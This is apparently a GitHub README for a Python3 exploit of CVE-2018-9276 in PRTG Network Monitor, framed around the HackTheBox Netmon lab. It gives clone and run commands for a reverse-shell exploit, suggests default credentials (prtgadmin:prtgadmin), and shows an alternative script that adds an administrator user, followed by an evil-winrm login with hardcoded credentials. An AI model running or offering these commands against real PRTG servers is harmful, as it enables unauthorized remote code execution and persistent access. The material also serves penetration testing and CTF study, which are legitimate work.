CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)
- Impacket (python3 version)
- Netcat
- Msfvenom
git clone https://github.com/A1vinSmith/CVE-2018-9276.git
./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
- The credentials are needed for performing the exploit. Try default credentials
prtgadmin:prtgadmin. And It might be worth checking the database or log to gain them. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data - Try
--lport 445if the port has not been occupied - There are few twisted comments in the code. They might need some modifications.
- It might take few attempts to succeed. Reboot a target machine is always a good option. Especially when your payload causes some impact.
HTB Netmon box
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA362
Original Install Date: 2/3/2019, 7:05:45 AM
System Boot Time: 7/28/2021, 9:02:41 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
A Big Thank you for wildkindcc's python2 version https://github.com/wildkindcc/CVE-2018-9276
https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/
https://www.codewatch.org/blog/?p=453
https://www.exploit-db.com/exploits/46527
https://github.com/chcx/PRTG-Network-Monitor-RCE
The credentials are needed for performing the exploit. First login and get the authenticated cookie to add a new user.
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"
// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
